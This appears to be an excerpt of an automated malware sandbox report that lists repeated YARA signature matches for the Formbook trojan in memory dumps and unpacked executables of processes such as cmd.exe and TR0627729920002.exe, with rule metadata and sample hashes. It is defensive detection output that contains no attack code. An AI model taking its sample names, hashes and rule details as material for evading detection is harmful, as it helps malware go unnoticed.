Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: TR0627729920002.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Yara signature match
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
